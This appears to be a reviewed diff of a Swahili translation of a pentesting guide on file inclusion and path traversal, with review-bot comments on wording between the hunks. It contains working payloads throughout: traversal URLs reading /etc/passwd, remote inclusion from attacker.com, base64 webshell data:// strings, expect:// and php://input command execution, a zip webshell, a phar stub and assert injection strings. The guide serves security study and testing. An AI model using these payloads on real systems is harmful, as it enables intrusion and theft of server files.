- **Determining the Required Number of Traversals**: Kwa jaribio na makosa, mtu anaweza kupata idadi sahihi ya `../` inayohitajika kufika kwenye root directory kisha `/etc/passwd`, akiweka uhakika kwamba nyongeza zozote (kama `.php`) zimefanywa zisifanye kazi lakini path inayotakiwa (`/etc/passwd`) inabaki isiyoharibiwa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza path na directory isiyokuwepo (kama `a/`). Mbinu hii hutumika kama tahadhari au kutimiza mahitaji ya mantiki ya server katika kuchambua path.
Unapotumia path truncation techniques, ni muhimu kuelewa tabia ya seva ya kuchanganua njia na muundo wa filesystem. Kila hali inaweza kuhitaji mbinu tofauti, na mara nyingi upimaji unahitajika kugundua mbinu yenye ufanisi zaidi.
When employing path truncation techniques, ni muhimu kuelewa tabia ya server katika kuchambua path na muundo wa mfumo wa faili. Kila senario inaweza kuhitaji mbinu tofauti, na mara nyingi majaribio yanahitajika ili kugundua njia yenye ufanisi zaidi.
**Udhaifu huu ulirekebishwa katika PHP 5.3.**
### **Njia za kuzunguka kichujio**
### **Filter bypass tricks**
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
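Review bot: `When employing path truncation techniques, ni muhimu ...` leaves the sentence opener untranslated, and `### **Njia za kuzunguka kichujio**` is replaced by the English `### **Filter bypass tricks**`; both should stay Swahili to match the surrounding headings. The rewritten bullet `- **Using Dot Segments and Additional Characters**: ... huku zikifanya server ipuuze nyongeza (kama .php)` is clearer than the one it replaces, since it names what gets discarded; keep that wording.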
@ -145,45 +145,45 @@ http://example.com/index.php?page=PhP://filter
```
## Remote File Inclusion
Katika php hii imezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inapaswa kuwa **On** ili ifanye kazi, na katika kesi hiyo unaweza kujumuisha faili ya PHP kutoka kwenye server yako na kupata RCE:
Katika php hili limezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inapaswa kuwa **On** ili lifanye kazi, na katika hali hiyo unaweza kujumuisha faili ya PHP kutoka kwenye seva yako na kupata RCE:
```python
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```
Ikiwa kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP ina **filtering** ya upatikanaji wa kurasa za nje, [kulingana na chapisho hili](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol pamoja na base64 ili ku-decoda msimbo wa PHP wa b64 na kupata RCE:
Ikiwa kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP iko kwenye **filtering** ya upatikanaji wa kurasa za nje, [kulingana na chapisho hili](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol pamoja na base64 ku-decode msimbo wa PHP wa b64 na kupata RCE:
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
> [!TIP]
> Katika code iliyotangulia, `+.txt` ya mwisho iliongezwa kwa sababu mshambulizi alihitaji string ambayo ilihitimisha kwa `.txt`, kwa hivyo string inahitimisha nayo na baada ya b64 decode sehemu hiyo itarudisha takataka tu na PHP code halisi itajumuishwa (na kwa hiyo, itatekelezwa).
> Katika msimbo uliopita, `+.txt` ya mwisho iliongezwa kwa sababu mshambuliaji alihitaji string iliyomalizika na `.txt`, hivyo string inamalizika nayo na baada ya b64 decode sehemu hiyo itarudisha tu takataka na PHP halisi itajumuishwa (na kwa hivyo, itatekelezwa).
Mfano mwingine **usiotumia `php://` protocol** ungekuwa:
Mfano mwingine **kutokutumia `php://` protocol** ungekuwa:
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
## Elementi ya Root ya Python
## Python Kipengele cha mzizi
Katika Python, katika msimbo kama huu:
Katika python, katika msimbo kama huu:
```python
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```
Ikiwa mtumiaji atatoa **absolute path** kwa **`file_name`**, **previous path** inafutwa tu:
Ikiwa mtumiaji anapitisha **absolute path** kwa **`file_name`**, **njia ya awali inaondolewa tu**:
```python
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
Hii ni tabia iliyokusudiwa kulingana na [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):
> Ikiwa sehemu ni njia kamili, sehemu zote zilizotangulia zinatupwa na kuunganisha kunaendelea kutoka kwenye sehemu ya njia kamili.
> Ikiwa sehemu ni absolute path, vipengele vyote vya awali vinatupwa na kuunganishwa kunaendelea kutoka kwa sehemu ya absolute path.
## Java Orodhesha madirektori
## Java: Kuorodhesha Folda
Inaonekana kwamba ikiwa una Path Traversal katika Java na unauliza **folda** badala ya faili, **orodha ya folda itarudishwa**. Hii haitatokee katika lugha nyingine (kwa kadiri ninavyojua).
Inaonekana kwamba ikiwa una Path Traversal katika Java na ukaomba **folda** badala ya faili, **orodha ya folda inarudishwa**. Hii haitatokea katika lugha nyingine (kwa kadri ninavyojua).
## Vigezo 25 vya Juu
Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa dhaifu kwa local file inclusion (LFI) (kutoka [link](https://twitter.com/trbughunters/status/1279768631845494787)):
Hapa kuna orodha ya vigezo 25 za juu ambazo zinaweza kuwa hatarini kwa local file inclusion (LFI) vulnerabilities (kutoka [link](https://twitter.com/trbughunters/status/1279768631845494787)):
```
?cat={payload}
?dir={payload}
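Review bot: the `data://` example without `php://` ends in `+txt`, whereas the example above it and the TIP both say the attacker needed a string ending in `.txt` (`+.txt`); unless the second scenario had no such suffix check, this looks like a dropped dot and the payload would not satisfy the filter it is meant to bypass. Smaller points in this hunk: `lakini PHP iko kwenye **filtering**` reads as "PHP is inside filtering"; the replaced `PHP ina **filtering**` was correct. `## Python Kipengele cha mzizi` has the words out of order for "Python root element" (`## Kipengele cha mzizi cha Python`). `vigezo 25 za juu` should agree as `vigezo 25 vya juu`, which the replaced line had right. And `http://atacker.com/mal.php` is misspelled on both sides; `attacker.com`, as in the UNC path on the next line.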
@ -211,27 +211,27 @@ Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa dhaifu kwa local fil
?mod={payload}
?conf={payload}
```
## LFI / RFI kutumia PHP wrappers & protocols
## LFI / RFI using PHP wrappers & protocols
### php://filter
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko kwenye data** kabla ya data kusomwa au kuandikwa. Kuna aina 5 za filters:
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko ya data** kabla ya kusomwa au kuandikwa. Kuna aina 5 za filters:
- [String Filters](https://www.php.net/manual/en/filters.string.php):
- `string.rot13`
- `string.toupper`
- `string.tolower`
- `string.strip_tags`: Ondoa tags kutoka kwenye data (kila kitu kati ya "<" na ">" chars)
- Kumbuka kuwa chujio hiki kimeondoka katika matoleo ya kisasa ya PHP
- Note that this filter has disappear from the modern versions of PHP
- [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
- `convert.base64-encode`
- `convert.base64-decode`
- `convert.quoted-printable-encode`
- `convert.quoted-printable-decode`
- `convert.iconv.*` : Hubadilisha kuwa encoding tofauti (`convert.iconv.<input_enc>.<output_enc>`). Ili kupata **orodha ya encodings zote** zinazotumika endesha kwenye console: `iconv -l`
- `convert.iconv.*` : Transforms to a different encoding(`convert.iconv.<input_enc>.<output_enc>`) . Ili kupata **orodha ya encodings zote** zinazoungwa mkono, endesha kwenye console: `iconv -l`
> [!WARNING]
> Kwa kutumia vibaya chujio cha `convert.iconv.*` unaweza **kutengeneza maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya include process isimamie maandishi yoyote. Kwa habari zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
> Kwa kutumia vibaya conversion filter ya `convert.iconv.*` unaweza **kutengeneza maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya function kama include isindike maandishi hayo. Kwa maelezo zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
- [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
- `zlib.deflate`: Compress the content (useful if exfiltrating a lot of info)
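Review bot: three lines in this hunk replace already-translated Swahili with English, which is the wrong direction for a translation commit: the heading "## LFI / RFI using PHP wrappers & protocols" (previously "## LFI / RFI kutumia PHP wrappers & protocols"), the note "Note that this filter has disappear from the modern versions of PHP" (previously "Kumbuka kuwa chujio hiki kimeondoka katika matoleo ya kisasa ya PHP"; the English also has a grammar slip, "has disappeared"), and the half-English `convert.iconv.*` bullet "Transforms to a different encoding(`convert.iconv.<input_enc>.<output_enc>`) ." with a missing space before the parenthesis and a stray space before the period. Suggest restoring the previous Swahili for all three.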
@ -240,9 +240,9 @@ PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko kwenye data*
- `mcrypt.*` : Deprecated
- `mdecrypt.*` : Deprecated
- Other Filters
- Ukiendesha katika php `var_dump(stream_get_filters());` utaona baadhi ya **vichujio visivyotarajiwa**:
- Running in php `var_dump(stream_get_filters());` you can find a couple of **unexpected filters**:
- `consumed`
- `dechunk`: inarudisha nyuma HTTP chunked encoding
- `dechunk`: reverses HTTP chunked encoding
- `convert.*`
```php
# String Filters
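Review bot: same regression as the previous hunk, the two "Other Filters" bullets revert to English: "Running in php `var_dump(stream_get_filters());` you can find a couple of **unexpected filters**:" and "`dechunk`: reverses HTTP chunked encoding" replace the already-translated "Ukiendesha katika php `var_dump(stream_get_filters());` utaona baadhi ya **vichujio visivyotarajiwa**:" and "`dechunk`: inarudisha nyuma HTTP chunked encoding". Keep the Swahili versions.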
@ -271,39 +271,39 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
```
> [!WARNING]
> Sehemu "php://filter" haizingatii tofauti za herufi
> Sehemu "php://filter" haitegemei herufi (case insensitive)
### Kutumia php filters kama oracle kusoma faili yoyote
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) inapendekeza mbinu ya kusoma faili ya ndani bila server kurudisha yaliyomo. Mbinu hii inategemea **boolean exfiltration of the file (char by char) using php filters** kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kuongeza maandishi kiasi cha kutosha kushinikiza php kutoa hitilafu.
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) imependekezwa mbinu ya kusoma faili ya ndani bila kupata output ikirejeshwa na server. Mbinu hii inategemea **boolean exfiltration of the file (char by char) using php filters** kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya maandishi kuwa makubwa vya kutosha hadi php itokee exception.
Katika post ya asili unaweza kupata maelezo ya kina ya mbinu hii, lakini hapa kuna muhtasari mfupi:
Katika original post unaweza kupata maelezo ya kina ya mbinu, lakini hapa ni muhtasari mfupi:
- Tumia codec **`UCS-4LE`** kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string ukuwe kwa kiasi kinachoongezeka kwa kasi (exponentially).
- Hii itatumika kuzalisha **maandishi makubwa sana wakati herufi ya mwanzo itakaponikuliwa kwa usahihi** kiasi kwamba php itasababisha **error**.
- Filter ya **dechunk** itafuta kila kitu **ikiwa char ya kwanza si hexadecimal**, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
- Hii, ikichanganywa na iliyo hapo awali (na filters nyingine kulingana na herufi iliyokisiwa), itatuwezesha kukisia herufi mwanzoni mwa maandishi kwa kuona wakati tunapofanya mabadiliko ya kutosha kuifanya isiwe herufi ya hexadecimal. Kwa kuwa ikiwa ni hex, dechunk haitafuta na mlipuko wa awali utasababisha php error.
- Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni `a` kwa mfano kwa sababu ikiwa tutaweka codec hii 6 mara a->b->c->d->e->f->g herufi haitakuwa tena tabia ya hexadecimal, kwa hivyo dechunk haitaiangusha na php error itasababisha kwa sababu inazidisha na initial bomb.
- Kwa kutumia mabadiliko mingine kama **rot13** mwanzoni inawezekana leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine kwenye eneo la hex).
- Wakati char ya mwanzo ni namba inahitajika kui-base64 encode na leak herufi 2 za kwanza ili leak namba hiyo.
- Tatizo la mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa chars na kupata mahali pa kwanza herufi nyingine za maandishi.
- Na ili kuwaze kupata **further data** wazo ni **kutengeneza 2 bytes za junk data mwanzoni** kwa kutumia **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** kuzifanya zi**pivot with the next 2 bytes**, na d**elete the data until the junk data** (hii itaondoa bytes 2 za mwanzo za maandishi ya awali). Endelea kufanya hivyo hadi utakapofikia sehemu unayotaka leak.
- Tumia codec **`UCS-4LE`** ili kuweka herufi ya mbele ya maandishi mwanzoni na kufanya ukubwa wa string kuongezeka kwa mfumuko.
- Hii itatumika kuzalisha **maandishi ambayo ni makubwa sana wakati herufi ya kwanza inakisia kwa usahihi** kiasi kwamba php itasababisha **error**.
- The **dechunk** filter itakayokuwa inafanya **remove everything if the first char is not an hexadecimal**, kwa hivyo tunaweza kujua kama herufi ya kwanza ni hex.
- Hii, ikichanganywa na ile ya hapo juu (na filters nyingine kulingana na herufi inayokisia), itaturuhusu kukisia herufi mwanzoni kwa kuona lini tunafanya mabadiliko ya kutosha kuifanya isiwe tabia ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitafuta na bomu la mwanzo litasababisha php error.
- The codec **convert.iconv.UNICODE.CP930** transforms every letter in the following one (so after this codec: a -> b). Hii inatuwezesha kugundua kama herufi ya kwanza ni `a`, kwa mfano, kwa sababu tukitumia codec hii mara 6 a->b->c->d->e->f->g herufi haitakuwa tena katika safu ya hexadecimal; hivyo dechunk haitaitoa na php error itachochewa kwa sababu inazidisha na bomu la mwanzo.
- Kutumia mabadiliko mengine kama **rot13** mwanzoni inawezekana ku leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine katika safu ya hex).
- Wakati herufi ya mwanzo ni namba ni lazima ui- base64 encode na leak herufi 2 za kwanza ili kupata namba.
- Tatizo la mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa herufi na kupata katika nafasi ya kwanza herufi nyingine za maandishi.
- Na ili kuwa na uwezo wa kupata **further data** wazo ni **kuzalisha bytes 2 za takataka mwanzoni** kwa **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** ili kuifanya **pivot with the next 2 bytes**, na d**elete the data until the junk data** (hii itatoa bytes 2 za mwanzo za maandishi ya awali). Endelea kufanya hivi hadi ufikie sehemu unayotaka ku leak.
Katika post pia ilileak zana ya kufanya hili moja kwa moja: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
Katika post pia ilifichuliwa zana ya kufanya hii kiotomatiki: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
### php://fd
This wrapper inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu ku-exfiltrate yaliyomo ya faili zilizofunguliwa:
Wrapper hii inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu kuexfiltrate content ya files zilizo wazi:
```php
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
```
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (Sijui jinsi hii ingefaa katika attack)
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (sijui jinsi hii ingekuwa muhimu katika shambulio)
### zip:// and rar://
Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie.\
Ili kuweza abuse the rar protocol, inahitaji **kuwezeshwa mahsusi**
Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie it.\
Ili kuweza kutumia vibaya rar protocol, **inahitaji kuamilishwa kwa njia maalum**.
```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
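Review bot: a stray English word survives in "Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie it." (the previous "na ufikie." was complete); drop "it". In the oracle bullet list two items are now half English, half Swahili: "The **dechunk** filter itakayokuwa inafanya **remove everything if the first char is not an hexadecimal**" and "The codec **convert.iconv.UNICODE.CP930** transforms every letter in the following one"; the replaced versions ("Filter ya **dechunk** itafuta kila kitu **ikiwa char ya kwanza si hexadecimal**", "Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata") read better and should be kept. Also, "haitegemei herufi (case insensitive)" says the string "does not depend on letters"; "haizingatii ukubwa wa herufi" is the accurate rendering of case-insensitive.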
@ -328,24 +328,24 @@ http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
Kumbuka kwamba protokoli hii inadhibitiwa na usanidi wa php **`allow_url_open`** na **`allow_url_include`**
Kumbuka kwamba itifaki hii imezuiwa na usanidi wa php **`allow_url_open`** na **`allow_url_include`**
### expect://
Expect inapaswa kuwa imewezeshwa. Unaweza kutekeleza msimbo kwa kutumia hii:
Expect inapaswa kuamilishwa. Unaweza execute code kwa kutumia hii:
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```
### input://
Taja payload yako katika POST parameters:
Taja payload yako katika vigezo vya POST:
```bash
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
```
### phar://
Faili la `.phar` linaweza kutumika kutekeleza PHP code wakati programu ya wavuti inapotumia function kama `include` kwa ajili ya kupakia faili. Kipande cha PHP cha chini kinaonyesha uundaji wa faili la `.phar`:
Faili ya `.phar` inaweza kutumika kutekeleza msimbo wa PHP wakati programu ya wavuti inatumia kazi kama `include` kwa ajili ya kupakia faili. Mfano wa msimbo wa PHP uliotolewa hapa chini unaonyesha utengenezaji wa faili `.phar`:
```php
<?php
$phar = new Phar('test.phar');
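Review bot: "Unaweza execute code kwa kutumia hii" mixes an untranslated English verb phrase into the Swahili sentence; the replaced line "Unaweza kutekeleza msimbo kwa kutumia hii" was already correct and should be kept. Relatedly, "itifaki hii imezuiwa na usanidi wa php" reads as "this protocol is blocked by the php configuration", whereas the point of the sentence is that `allow_url_open` and `allow_url_include` gate whether it works; the previous "inadhibitiwa" (is controlled by) is the closer rendering.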
@ -354,13 +354,13 @@ $phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```
Ili ku-compile faili la `.phar`, amri ifuatayo inapaswa kutekelezwa:
Ili kujenga faili ya `.phar`, amri ifuatayo inapaswa kutekelezwa:
```bash
php --define phar.readonly=0 create_path.php
```
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
Katika kesi ambapo LFI inafanya tu kusoma faili bila kutekeleza msimbo wa PHP ndani yake, kupitia functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, inaweza kujaribu exploitation ya deserialization vulnerability. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya `phar`.
Kwenye kesi ambapo LFI inafanya tu kusoma faili bila kutekeleza msimbo wa PHP ndani yake, kupitia functions kama `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, au `filesize()`, kujaribu udhuru wa deserialization kunaweza kufanywa. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya `phar`.
For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:
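Review bot: "kujaribu udhuru wa deserialization kunaweza kufanywa" is a mistranslation: "udhuru" means an excuse or apology, not exploitation, so the sentence no longer says what the replaced line ("inaweza kujaribu exploitation ya deserialization vulnerability") said; keep the loanword "exploitation" or use "unyonyaji wa udhaifu wa deserialization". The two English sentences around it ("Upon execution, a file named `test.phar` will be created ..." and "For a detailed understanding of exploiting deserialization vulnerabilities ...") are untouched context and still untranslated; worth covering in the same pass.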
@ -373,36 +373,36 @@ phar-deserialization.md
### CVE-2024-2961
Ilikuwa inawezekana kutumia vibaya **any arbitrary file read from PHP that supports php filters** kupata RCE. The detailed description can be [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: **3 byte overflow** katika PHP heap ilitumiwa vibaya ili **alter the chain of free chunks** za ukubwa maalum ili kuweza **write anything in any address**, hivyo hook iliongezwa kuitisha **`system`**.\
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kutumia zaidi php filters.
Ilikuwa inawezekana kutumia vibaya **any arbitrary file read from PHP that supports php filters** ili kupata RCE. Maelezo ya kina yanaweza [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: a **3 byte overflow** in the PHP heap was abused to **alter the chain of free chunks** of anspecific size in order to be able to **write anything in any address**, so a hook was added to call **`system`**.\
Ilikuwa inawezekana ku-alloc chunks of specific sizes abusing more php filters.
### More protocols
Angalia zaidi[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
Angalia zaidi possible[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika katika memory au katika faili ya muda (sidhani jinsi hii inaweza kuwa muhimu katika file inclusion attack)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kupata filesystem ya eneo
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kupata HTTP(s) URLs
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kupata FTP(s) URLs
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Mtiririko ya compression
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (Hairejeshi chochote kinachoweza kuchapishwa, hivyo sio muhimu hapa)
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika kwenye memory au kwenye faili ya muda (siwezi kuona jinsi hii inaweza kuwa muhimu katika file inclusion attack)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kufikia filesystem ya ndani
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kufikia URLs za HTTP(s)
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kufikia URLs za FTP(s)
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Mtiririko wa compression
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Kutafuta pathnames zinazofanana na pattern (Hakirudishi kitu chochote kinachoweza kuchapishwa, hivyo sio muhimu hapa)
- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Si muhimu kusoma arbitrary files)
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Haifai kusoma faili za aina yoyote)
## LFI via PHP's 'assert'
Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa wakati wa kushughulikia function ya 'assert', ambayo inaweza kutekeleza msimbo ndani ya strings. Hii ni tatizo hasa ikiwa input inayojumuisha characters za directory traversal kama ".." inakaguliwa lakini haijasafishwa ipasavyo.
Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa pale unaposhughulika na function 'assert', ambayo inaweza kutekeleza msimbo uliomo katika strings. Hii ni tatizo hasa ikiwa ingizo lenye characters za directory traversal kama ".." linachunguzwa lakini halijasafishwa ipasavyo.
Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia directory traversal kama ifuatavyo:
For example, PHP code might be designed to prevent directory traversal like so:
```bash
assert("strpos('$file', '..') === false") or die("");
```
Ingawa hili linalenga kuzuia traversal, kwa bahati mbaya linaunda vector kwa ajili ya code injection. Ili kuvitumia kusoma file contents, attacker anaweza kutumia:
Ingawa hili linakusudia kuzuia traversal, kwa bahati mbaya linaleta vektori ya code injection. Ili kutumia hili kusoma yaliyomo kwenye faili, mshambuliaji anaweza kutumia:
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```
Kwa njia sawa, kwa kutekeleza amri yoyote za mfumo, mtu anaweza kutumia:
Vivyo hivyo, kwa kutekeleza amri za mfumo yoyote, mtu anaweza kutumia:
```plaintext
' and die(system("id")) or '
```
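Review bot: the CVE-2024-2961 summary regresses from Swahili to English and picks up a typo: "Muhtasari mfupi: a **3 byte overflow** in the PHP heap was abused to **alter the chain of free chunks** of anspecific size" ("anspecific" should be "a specific", and the replaced line "katika PHP heap ilitumiwa vibaya ili **alter the chain of free chunks** za ukubwa maalum" was already translated). The same reversion happens to "For example, PHP code might be designed to prevent directory traversal like so:", which replaces "Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia directory traversal kama ifuatavyo:". Two smaller points: "Angalia zaidi possible[ **protocols to include here**]" has a stray "possible" glued to the link, and "(Haifai kusoma faili za aina yoyote)" says "files of any type" where the meaning is "arbitrary files" ("faili yoyote").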
@ -411,38 +411,38 @@ Ni muhimu **URL-encode these payloads**.
## PHP Blind Path Traversal
> [!WARNING]
> Mbinu hii inafaa katika kesi ambapo wewe unadhibiti **file path** ya **PHP function** ambayo ita **access a file** lakini hutaona yaliyomo ya faili (kama simu rahisi ya **`file()`**) kwani yaliyomo hayajaonyeshwa.
> Mbinu hii inahusu matukio ambapo **undhibiti** **njia ya faili** ya **function ya PHP** ambayo itafikia faili lakini hautaona yaliyomo ya faili (kama simu rahisi kwa **`file()`**) lakini yaliyomo hayajaonyeshwa.
In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) imeelezwa jinsi blind path traversal inaweza kutumiwa via PHP filter ili **exfiltrate the content of a file via an error oracle**.
In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) it's explained how a blind path traversal can be abused via PHP filter to **exfiltrate the content of a file via an error oracle**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** kufanya yaliyomo ya faili kuwa **big** kiasi kwamba **PHP function opening** faili itasababisha **error**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** ili kufanya yaliyomo ya faili kuwa hivyo **big** kiasi kwamba **PHP function inayofungua** faili itasababisha **kosa**.
Kisha, ili leak the first char filter **`dechunk`** inatumiwa pamoja na nyingine kama **base64** au **rot13** na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumika ili **place other chars at the beggining and leak them**.
Kisha, ili leak char ya kwanza filter **`dechunk`** inatumiwa pamoja na nyingine kama **base64** au **rot13**, na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumiwa kuweka chars nyingine mwanzoni na leak hizo.
Functions ambazo zinaweza kuwa hatarini: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
**Functions ambazo zinaweza kuwa hatarini**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
Kwa maelezo ya kiufundi angalia post uliotajwa!
Kwa maelezo ya kiufundi angalia chapisho lililotajwa!
## LFI2RCE
### Arbitrary File Write via Path Traversal (Webshell RCE)
Wakati code ya server-side inayokubali/uploads faili inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, jina la faili au URL) bila canonicalising na validating, `..` segments na absolute paths zinaweza kutoroka kutoka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kwa kawaida unapata unauthenticated RCE kwa kuacha webshell.
When server-side code that ingests/uploads files builds the destination path using user-controlled data (e.g., a filename or URL) without canonicalising and validating it, `..` segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell.
Typical exploitation workflow:
- Tambua write primitive katika endpoint au background worker inayokubali path/filename na kuandika yaliyomo kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
- Tambua web-exposed directories. Common examples:
- Tambua primitive ya kuandika katika endpoint au background worker inayokubali path/filename na inaandika content kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
